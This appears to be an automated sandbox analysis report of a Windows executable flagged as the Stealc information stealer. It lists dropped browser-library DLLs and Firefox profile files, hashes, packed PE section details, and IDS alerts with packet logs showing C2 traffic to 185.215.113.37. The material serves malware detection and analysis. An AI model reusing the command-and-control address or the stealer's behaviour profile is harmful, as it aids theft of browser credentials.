Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.946306768208729
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'825'280 bytes
MD5:	af274b2e6f0b472537f6a2ddd4356070
SHA1:	09ecc220306de02815a7c3bc06c28c44d1a6a33c
SHA256:	66157b51bb3cf15e86bb9726ef16e8453bda847c90c53039933773401c8f4359
SHA512:	73acc987c207c49d5c4bdfcf83d2f31991639bd17fa5a210e3a7fe394d5f5b191961bc8c458139d6367f2d0d7b5e06ed028480a20468e306d337126bd84e02b6
SSDEEP:	49152:ALRv5xDM0YsVsO6VdjhGRdW985FrlYRJo77U2gtWrja:ALZ5fgJxYR085FrlS2MptW
TLSH:	1D8533C37EFBB93FD0E90CF75E1E9ABA3A040DD260F46C9C755A1481B8A43964709987
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xa90000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F0674CF62FAh
popcnt ebx, dword ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	d2bb494e64af91bd8e48369515995d59	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x299000	0x200	72ef02d624e789b177343d1b19835653	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lyfkycld	0x4f7000	0x198000	0x197600	a17c65cf86272afcb4998e900e60f04b	False	0.9948454040733353	data	7.954248999444363	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wellcrkw	0x68f000	0x1000	0x600	c375f3e798544b4664d51e222dc0704d	False	0.5794270833333334	data	5.101123961961117	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x690000	0x3000	0x2200	f63af80fb85bf07b7aaa971b0e5aeb68	False	0.0720358455882353	DOS executable (COM)	0.754779195593719	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T21:14:06.193296+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49705	185.215.113.37	80	TCP
2024-09-26T21:14:06.497610+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.5	49705	185.215.113.37	80	TCP
2024-09-26T21:14:06.505678+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.5	49705	TCP
2024-09-26T21:14:06.736704+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.5	49705	185.215.113.37	80	TCP
2024-09-26T21:14:06.746268+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.5	49705	TCP
2024-09-26T21:14:07.733500+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.5	49705	185.215.113.37	80	TCP
2024-09-26T21:14:08.242746+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49705	185.215.113.37	80	TCP
2024-09-26T21:14:13.185546+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49705	185.215.113.37	80	TCP
2024-09-26T21:14:14.273482+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49705	185.215.113.37	80	TCP
2024-09-26T21:14:14.926896+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49705	185.215.113.37	80	TCP
2024-09-26T21:14:15.543213+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49705	185.215.113.37	80	TCP
2024-09-26T21:14:17.270938+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49705	185.215.113.37	80	TCP
2024-09-26T21:14:17.791806+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49705	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 21:14:05.185070038 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:05.190221071 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:05.190417051 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:05.190687895 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:05.195544958 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:05.916886091 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:05.916956902 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:05.938676119 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:05.944061995 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:06.193181992 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:06.193295956 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:06.243915081 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:06.248810053 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:06.497490883 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:06.497509956 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:06.497610092 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:06.498934031 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:06.505677938 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:06.736583948 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:06.736602068 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:06.736617088 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:06.736704111 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:06.737592936 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:06.737617016 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:06.737632036 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:06.737660885 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:06.737699032 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:06.739315033 CEST	49705	80	192.168.2.5	185.215.113.37
